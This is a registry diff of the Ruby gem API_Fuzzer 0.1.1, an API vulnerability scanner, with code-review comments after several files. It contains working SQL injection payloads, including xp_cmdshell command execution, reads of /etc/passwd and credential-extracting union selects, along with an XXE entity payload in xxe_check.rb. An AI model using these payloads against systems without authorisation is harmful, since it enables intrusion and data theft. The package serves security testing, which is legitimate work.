API_Fuzzer 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.gitignore +10 -0
- data/.travis.yml +5 -0
- data/API_Fuzzer.gemspec +31 -0
- data/CODE_OF_CONDUCT.md +49 -0
- data/Gemfile +11 -0
- data/LICENSE.txt +21 -0
- data/README.md +91 -0
- data/Rakefile +10 -0
- data/app/controllers/ping_controller.rb +22 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/config/routes.rb +4 -0
- data/lib/API_Fuzzer.rb +43 -0
- data/lib/API_Fuzzer/csrf_check.rb +41 -0
- data/lib/API_Fuzzer/engine.rb +5 -0
- data/lib/API_Fuzzer/error.rb +11 -0
- data/lib/API_Fuzzer/header_info.rb +50 -0
- data/lib/API_Fuzzer/idor_check.rb +62 -0
- data/lib/API_Fuzzer/privilege_escalation_check.rb +78 -0
- data/lib/API_Fuzzer/rate_limit_check.rb +69 -0
- data/lib/API_Fuzzer/redirect_check.rb +106 -0
- data/lib/API_Fuzzer/request.rb +69 -0
- data/lib/API_Fuzzer/resource_info.rb +51 -0
- data/lib/API_Fuzzer/sql_blind_check.rb +52 -0
- data/lib/API_Fuzzer/sql_check.rb +156 -0
- data/lib/API_Fuzzer/version.rb +3 -0
- data/lib/API_Fuzzer/vulnerability.rb +14 -0
- data/lib/API_Fuzzer/xss_check.rb +92 -0
- data/lib/API_Fuzzer/xxe_check.rb +47 -0
- data/payloads/blind_sql.txt +3 -0
- data/payloads/detect/sql.txt +89 -0
- data/payloads/sql.txt +196 -0
- data/payloads/xss.txt +58 -0
- data/rules/headers.yml +17 -0
- data/rules/info.yml +21 -0
- metadata +163 -0
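--- a/data/lib/API_Fuzzer/sql_check.rb
+++ b/data/lib/API_Fuzzer/sql_check.rb
@@ -0,0 +1,156 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+  class InvalidURLError < StandardError; end
+
+  class SqlCheck
+    attr_accessor :parameters
+    attr_accessor :payloads, :sql_errors
+
+    ALLOWED_METHODS = [:get, :post].freeze
+    PAYLOAD_PATH = File.expand_path('../../../payloads/sql.txt', __FILE__)
+    DETECT_PATH = File.expand_path('../../../payloads/detect/sql.txt', __FILE__)
+
+    def self.scan(options = {})
+      @payloads = []
+      @sql_errors = []
+      fetch_payloads
+      @url = options[:url] || nil
+      raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+      @params = options[:params] || {}
+      @cookies = options[:cookies] || {}
+      @json = options[:json] || false
+      @headers = options[:headers] || {}
+      @vulnerabilities = []
+
+      fuzz_payloads
+      return @vulnerabilities.uniq { |vuln| vuln.description }
+    rescue HTTP::ConnectionError => e
+      sleep(5)
+      fuzz_payloads
+      return @vulnerabilities.uniq { |vuln| vuln.description }
+    end
+
+    def self.fuzz_payloads
+      @payloads.each do |payload|
+        fuzz_each_payload(payload)
+      end
+    end
+
+    def self.fuzz_each_payload(payload)
+      uri = URI(@url)
+      path = uri.path
+      query = uri.query
+      base_uri = query.nil? ? path : [path, query].join("?")
+      fragments = base_uri.split(/[\/,?,&]/) - ['']
+      fragments.each do |fragment|
+        if fragment.match(/\A(\w)+=(\w)*\z/)
+          url = @url.gsub(fragment, [fragment, payload].join('')).chomp
+          fuzz_each_fragment(url, payload)
+        else
+          url = @url.gsub(fragment, payload).chomp
+          fuzz_each_fragment(url, payload)
+        end
+      end
+
+      return if @params.empty?
+
+      @params.keys.each do |parameter|
+        fuzz_each_parameter(parameter, payload)
+      end
+    end
+
+    def self.fuzz_each_fragment(url, payload)
+      ALLOWED_METHODS.each do |method|
+        begin
+          response = API_Fuzzer::Request.send_api_request(
+            url: url,
+            method: method,
+            cookies: @cookies,
+            headers: @headers
+          )
+
+          @vulnerabilities << API_Fuzzer::Error.new(description: "#{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+          body = ''
+          if response_json?(response)
+            body = JSON.parse(response.body)
+          else
+            body = response.body
+          end
+
+          vulnerable = check_response?(body.to_s.downcase, payload)
+          next unless vulnerable
+          @vulnerabilities << API_Fuzzer::Vulnerability.new(
+            description: "Possible SQL injection in #{method} #{@url}",
+            parameter: "URL: #{url}",
+            value: "[PAYLOAD] #{payload}",
+            type: 'HIGH'
+          )
+        rescue Exception => e
+          puts e.message
+        end
+      end
+    end
+
+    def self.fuzz_each_parameter(parameter, payload)
+      @params[parameter] = payload
+      ALLOWED_METHODS.each do |method|
+        begin
+          response = API_Fuzzer::Request.send_api_request(
+            url: @url,
+            params: @params,
+            method: method,
+            cookies: @cookies,
+            headers: @headers
+          )
+
+          @vulnerabilities << API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+          body = response.body.to_s.downcase
+          vulnerable = check_response?(body, payload)
+          next unless vulnerable
+
+          @vulnerabilities << API_Fuzzer::Vulnerability.new(
+            description: "Possible SQL injection in #{method} #{@url} parameter: #{parameter}",
+            parameter: "parameter: #{@parameter}",
+            value: "[PAYLOAD] #{payload}",
+            type: 'HIGH'
+          )
+        rescue Exception => e
+          puts e.message
+        end
+      end
+    end
+
+    def self.check_response?(body, payload)
+      @sql_errors.each do |error|
+        if body.match(error.chomp)
+          puts error
+          return true
+        end
+      end
+      false
+    end
+
+    def self.success?(response)
+      response.code == 200
+    end
+
+    def self.response_json?(response)
+      response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/
+    end
+
+    def self.fetch_payloads
+      file = File.expand_path(PAYLOAD_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        @payloads << line
+      end
+
+      file = File.expand_path(DETECT_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        @sql_errors << line.downcase
+      end
+    end
+  end
+end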
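Review bot: `check_response?` hands each signature line to `String#match`, which compiles a String argument into a Regexp, so detect/sql.txt entries such as `[IBM][CLI Driver][DB2/6000]` or `Warning: mysql_query()` are evaluated as character classes and groups rather than as literal text; use `body.include?(error.chomp)` (or `Regexp.escape(error.chomp)`) there. `fetch_payloads` keeps the trailing newline of every line (`@payloads << line`), so the newline is sent as part of `@params[parameter] = payload` and ends up in the `[PAYLOAD]` value; `@payloads << line.chomp` fixes it, and xss_check.rb's `fetch_payloads` has the same problem, where it additionally makes the `include?(payload)` reflection check miss. `rescue Exception => e` in fuzz_each_fragment and fuzz_each_parameter also swallows Interrupt and SystemExit, so a long fuzz run cannot be stopped with Ctrl-C; `rescue StandardError => e` is sufficient here. `parameter: "parameter: #{@parameter}"` reads an instance variable that is never assigned (the method's argument is the local `parameter`), so the field is always empty; xss_check.rb's description string has the same typo. `@params[parameter] = payload` writes into the hash the caller passed as `options[:params]` and leaves each payload in place for the following parameters' requests; sending a per-request copy, `params: @params.merge(parameter => payload)`, avoids both.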
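--- a/data/lib/API_Fuzzer/vulnerability.rb
+++ b/data/lib/API_Fuzzer/vulnerability.rb
@@ -0,0 +1,14 @@
+module API_Fuzzer
+
+  class Vulnerability
+    attr_accessor :description, :value, :type, :parameter
+
+    def initialize(options = {})
+      @description = options[:description]
+      @parameter = options[:parameter]
+      @value = options[:value]
+      @type = options[:type]
+    end
+  end
+
+end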
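Review bot: `initialize(options = {})` takes an untyped hash and silently leaves an attribute nil when a caller passes an unexpected key; every call site in sql_check.rb and xss_check.rb already uses `key: value` syntax, so `def initialize(description: nil, parameter: nil, value: nil, type: nil)` keeps them unchanged and turns an unknown key into an `ArgumentError`. The class has no documentation of what the fields hold; a header comment along the lines of `# A finding reported by a check: description (what/where), parameter (the fuzzed URL or parameter), value (the payload that triggered it) and type (severity label, 'HIGH' or 'MEDIUM' in the current checks)` would tell a reader how the checks use it. Since the fields are only set in the constructor, `attr_reader` is enough unless external mutation is intended.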
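--- a/data/lib/API_Fuzzer/xss_check.rb
+++ b/data/lib/API_Fuzzer/xss_check.rb
@@ -0,0 +1,92 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+
+  class InvalidURLError < StandardError; end
+
+  class XssCheck
+    attr_accessor :parameters
+
+    ALLOWED_METHODS = [:get, :post].freeze
+    PAYLOADS = []
+    PAYLOAD_PATH = File.expand_path('../../../payloads/xss.txt', __FILE__)
+
+    def self.scan(options = {})
+      @url = options[:url] || nil
+      raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+      @params = options[:params] || {}
+      @cookies = options[:cookies] || {}
+      @headers = options[:headers] || {}
+      @json = options[:json] || false
+      @vulnerabilities = []
+
+      fetch_payloads
+      PAYLOADS.each do |payload|
+        fuzz_each_payload(payload)
+      end
+      @vulnerabilities.uniq { |vuln| vuln.description }
+    end
+
+    private
+
+    def self.fuzz_each_payload(payload)
+      @params.keys.each do |parameter|
+        fuzz_each_parameter(parameter, payload)
+      end
+    end
+
+    def self.fuzz_each_parameter(parameter, payload)
+      @params[parameter] = payload
+
+      ALLOWED_METHODS.each do |method|
+        response = API_Fuzzer::Request.send_api_request(
+          url: @url,
+          params: @params,
+          method: method,
+          cookies: @cookies,
+          headers: @headers
+        )
+
+        if response_json?(response)
+          body = JSON.parse(response.body)
+        else
+          vulnerable = check_response?(response.body, payload)
+
+          if success?(response)
+            @vulnerabilities << API_Fuzzer::Vulnerability.new(
+              description: "Possible XSS in #{method} #{@url} parameter: #{@parameter}",
+              value: "[PAYLOAD] #{payload}",
+              type: 'MEDIUM'
+            ) if vulnerable
+          else
+            API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body)
+          end
+        end
+      end
+    end
+
+    def self.check_response?(body, payload)
+      if body.to_s.include?(payload)
+        return true
+      end
+      false
+    end
+
+    def self.success?(response)
+      response.code == 200
+    end
+
+    def self.response_json?(response)
+      response && response.headers['Content-Type'].downcase =~ /application\/json/
+    end
+
+    def self.fetch_payloads
+      file = File.expand_path(PAYLOAD_PATH, __FILE__)
+      File.readlines(file).each do |line|
+        PAYLOADS << line
+      end
+    end
+  end
+end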
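Review bot: In fuzz_each_parameter the JSON branch parses `response.body` into `body` and then does nothing with it — `vulnerable` is only computed in the `else` branch — so responses served as application/json (the normal case for an API) are never checked for a reflected payload; compute `vulnerable = check_response?(response.body, payload)` before `if response_json?(response)` and drop the unused `body`. In the `else` of `if success?(response)` the `API_Fuzzer::Error.new(...)` is built and discarded instead of being appended to `@vulnerabilities` as sql_check.rb does. `PAYLOADS = []` is a constant that `fetch_payloads` appends to on every `scan`, so a second scan in the same process sends every payload twice; reset a class-level `@payloads = []` per scan like sql_check.rb, or guard the load with `return unless PAYLOADS.empty?`. `response_json?` calls `response.headers['Content-Type'].downcase` without the nil guard that sql_check.rb's version has, and this loop has no rescue, so a single response without a Content-Type header aborts the whole scan with NoMethodError. The bare `private` between scan and fuzz_each_payload has no effect on `def self.` methods; use `private_class_method` or remove it.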
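--- a/data/lib/API_Fuzzer/xxe_check.rb
+++ b/data/lib/API_Fuzzer/xxe_check.rb
@@ -0,0 +1,47 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+  class XxeCheck
+
+    def self.scan(options = {})
+      @url = options[:url] || nil
+      @params = options[:params]
+      @scan_hash = options[:scan]
+      @cookies = options[:cookies] || {}
+      @headers = options[:headers] || {}
+      fuzz_xml_params
+    end
+
+    private
+
+    def self.fuzz_xml_params
+      return unless @params
+      body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
+      payload = <<-XXEPAYLOAD
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
+      XXEPAYLOAD
+      payload << body
+      API_Fuzzer::Request.send_api_request(
+        url: @url,
+        params: payload,
+        body: true,
+        method: :post,
+        headers: @headers,
+        cookies: @cookies
+      )
+    end
+
+    def self.params_serialize
+      body = []
+      @params.keys.each do |key, value|
+        body << "#{key}=#{value}"
+      end
+      body.join('&')
+    end
+  end
+end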
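Review bot: `params_serialize` iterates `@params.keys.each do |key, value|`, and `keys` yields only the key, so `value` is always nil and every parameter is serialized as `key=`; iterate the hash itself, `@params.each do |key, value|`. `scan` skips the `raise InvalidURLError, "[ERROR] URL missing in argument" unless @url` check that the other checks perform and returns whatever `send_api_request` returns instead of a vulnerability list, so callers get a result type unlike SqlCheck.scan and XssCheck.scan. The heredoc uses `<<-`, which preserves leading whitespace; if those four XML lines are indented in the source (the rendered diff drops indentation) the payload starts with spaces before `<?xml`, which is not a valid XML document start — `<<~XXEPAYLOAD` avoids that. The callback base `http://127.0.0.1:3000/ping/` is hard-coded into the heredoc; it belongs in a constant or a `scan` option next to `@scan_hash`, with a comment naming the component expected to listen there (presumably the ping_controller.rb in this diffstat). As in xss_check.rb, the bare `private` does not apply to `def self.` methods.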
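--- a/data/payloads/detect/sql.txt
+++ b/data/payloads/detect/sql.txt
@@ -0,0 +1,89 @@
+</font><font face="Arial" size=2>
+A syntax error has occurred
+ADODB.Field error
+ASP.NET is configured to show verbose error messages
+ASP.NET_SessionId
+Active Server Pages error
+An illegal character has been found in the statement
+An unexpected token "END-OF-STATEMENT" was found
+CLI Driver
+Can't connect to local
+Custom Error Message
+DB2 Driver
+DB2 Error
+DB2 ODBC
+Died at
+Disallowed Parent Path
+Error Diagnostic Information
+Error Message : Error loading required libraries.
+Error Report
+Error converting data type varchar to numeric
+Fatal error
+Incorrect syntax near
+Index of
+Internal Server Error
+Invalid Path Character
+Invalid procedure call or argument
+Invision Power Board Database Error
+JDBC Driver
+JDBC Error
+JDBC MySQL
+JDBC Oracle
+JDBC SQL
+Microsoft OLE DB Provider for ODBC Drivers
+Microsoft VBScript compilation error
+Microsoft VBScript error
+MySQL Driver
+MySQL Error
+MySQL ODBC
+ODBC DB2
+ODBC Driver
+ODBC Error
+ODBC Microsoft Access
+ODBC Oracle
+ODBC SQL
+ODBC SQL Server
+OLE/DB provider returned message
+ORA-0
+ORA-1
+Oracle DB2
+Oracle Driver
+Oracle Error
+Oracle ODBC
+PHP Error
+PHP Parse error
+PHP Warning
+Parent Directory
+Permission denied: 'GetObject'
+PostgreSQL query failed: ERROR: parser: parse error
+SQL Server Driver
+SQL Server
+SQL command not properly ended
+SQLException
+Supplied argument is not a valid PostgreSQL result
+Syntax error in query expression
+The error occurred in
+The script whose uid is
+Type mismatch
+Unable to jump to row
+Unclosed quotation mark before the character string
+Unterminated string constant
+Warning: Cannot modify header information - headers already sent
+Warning: Supplied argument is not a valid File-Handle resource in
+Warning: mysql_query()
+Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
+You have an error in your SQL syntax near
+data source=
+detected an internal error [IBM][CLI Driver][DB2/6000]
+include_path
+invalid query
+is not allowed to access
+mySQL error with query
+mysql error
+on MySQL result index
+server object error
+supplied argument is not a valid MySQL result resource
+unexpected end of SQL command
+MySQL server version
+You have an error in your SQL syntax
+SQL syntax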
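Review bot: Several entries in this list are not database error messages, yet sql_check.rb reports any match as `Possible SQL injection` with type 'HIGH': `</font><font face="Arial" size=2>`, `Index of`, `Parent Directory`, `Internal Server Error`, `Fatal error`, `Custom Error Message` and `ASP.NET_SessionId` will match directory listings, generic 500 pages and any ASP.NET response that sets a session cookie, so the scanner will flag them regardless of the payload sent. Matching is a case-insensitive substring test (sql_check.rb downcases both the body and each line), which makes very short entries like these especially prone to false positives. Move the generic ones to a lower-severity list or drop them, and note the intent of the file in README.md rather than in the file itself, since every line of it is read as a signature.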
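--- a/data/payloads/sql.txt
+++ b/data/payloads/sql.txt
@@ -0,0 +1,196 @@
+'
+' --
+(
+)
+*|
+*/*
+&
+0
+031003000270000
+0 or 1=1
+0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
+0x77616974666F722064656C61792027303A303A31302700 exec(@s)
+1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
+1 or 1=1
+1;SELECT%20*
+1 waitfor delay '0:0:10'--
+'%20or%20''='
+'%20or%201=1
+')%20or%20('x'='x
+'%20or%20'x'='x
+%20or%20x=x
+%20'sleep%2050'
+%20$(sleep%2050)
+%21
+23 OR 1=1
+hi' or '1'='1'--
+%26
+%27%20or%201=1
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+||6
+'||'6
+(||6)
+%7C
+a'
+admin' or '
+' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
+' and 1 in (select var from temp)--
+anything' OR 'x'='x
+"a"" or 1=1--"
+a' or 1=1--
+"a"" or 3=3--"
+a' or 3=3--
+a' or 'a' = 'a
+'%20OR
+as
+asc
+a' waitfor delay '0:0:10'--
+'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
+bfilename
+char%4039%41%2b%40SELECT
+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
+declare @q nvarchar (4000) select @q =
+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
+declare @s varchar(22) select @s =
+declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
+delete
+desc
+distinct
+'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
+'; exec master..xp_cmdshell
+'; exec master..xp_cmdshell 'ping 172.10.1.255'--
+exec(@s)
+'; exec ('sel' + 'ect us' + 'er')
+exec sp
+'; execute immediate 'sel' || 'ect us' || 'er'
+exec xp
+'; exec xp_regread
+' group by userid having 1=1--
+handler
+having
+' having 1=1--
+hi or 1=1 --"
+hi' or 1=1 --
+"hi"") or (""a""=""a"
+hi or a=a
+hi' or 'a'='a
+hi') or ('a'='a
+'hi' or 'x'='x';
+insert
+like
+limit
+*(|(mail=*))
+*(|(objectclass=*))
+or
+' or ''='
+or 0=0 #"
+' or 0=0 --
+' or 0=0 #
+" or 0=0 --
+or 0=0 --
+or 0=0 #
+' or 1 --'
+' or 1/*
+; or '1'='1'
+' or '1'='1
+' or '1'='1'--
+' or 1=1
+' or 1=1 /*
+' or 1=1--
+' or 1=1--
+'/**/or/**/1/**/=/**/1
+‘ or 1=1 --
+" or 1=1--
+or 1=1
+or 1=1--
+or 1=1 or ""=
+' or 1=1 or ''='
+' or 1 in (select @@version)--
+or%201=1
+or%201=1 --
+' or 2 > 1
+' or 2 between 1 and 3
+' or 3=3
+‘ or 3=3 --
+' or '7659'='7659
+or a=a
+or a = a
+' or 'a'='a
+' or a=a--
+') or ('a'='a
+" or "a"="a
+) or (a=a
+order by
+' or (EXISTS)
+or isNULL(1/0) /*
+" or isNULL(1/0) /*
+' or 'something' like 'some%'
+' or 'something' = 'some'+'thing'
+' or 'text' = n'text'
+' or 'text' > 't'
+' or uid like '%
+' or uname like '%
+' or 'unusual' = 'unusual'
+' or userid like '%
+' or user like '%
+' or username like '%
+' or username like char(37);
+' or 'whatever' in ('whatever')
+' -- &password=
+password:*/=1--
+PRINT
+PRINT @@variable
+procedure
+replace
+select
+' select * from information_schema.tables--
+' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
+' (select top 1
+--sp_password
+'sqlattempt1
+(sqlattempt2)
+'sqlvuln
+'+sqlvuln
+(sqlvuln)
+sqlvuln;
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+to_timestamp_tz
+truncate
+tz_offset
+' UNION ALL SELECT
+' union all select @@version--
+' union select
+uni/**/on sel/**/ect
+' UNION SELECT
+' union select 1,load_file('/etc/passwd'),1,1,1;
+) union select * from information_schema.tables;
+' union select * from users where login = char(114,111,111,116);
+update
+'||UTL_HTTP.REQUEST
+,@variable
+@variable
+@var select @var as var into temp end --
+\x27UNION SELECT
+x' AND 1=(SELECT COUNT(*) FROM tabname); --
+x' AND email IS NULL; --
+x' AND members.email IS NULL; --
+x' AND userid IS NULL; --
+x' or 1=1 or 'x'='y
+x' OR full_name LIKE '%Bob%
+ý or 1=1 --
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1
+1or1=1
+1'or'1'='1
+fake@ema'or'il.nl'='il.nl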
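Review bot: The list mixes error-provoking probes with payloads that execute commands or stall the database — `'; exec master..xp_cmdshell 'ping 172.10.1.255'--`, `t'exec master..xp_cmdshell 'nslookup www.google.com'--`, `1 waitfor delay '0:0:10'--` and `a' waitfor delay '0:0:10'--` — and sql_check.rb sends every line to every path segment and every parameter over both GET and POST with no opt-in, so a scan of anything other than a disposable test instance can affect the target. Keep the command-executing and time-based entries out of the default list (or behind an explicit option) and say so in README.md; the time-based ones also gain nothing here, since `check_response?` only looks for error strings and never measures response time. `' or 1=1--` appears twice (file lines 106 and 107), and `‘ or 1=1 --` and `‘ or 3=3 --` start with a U+2018 curly quote — worth confirming that is intentional rather than a copy-and-paste artifact.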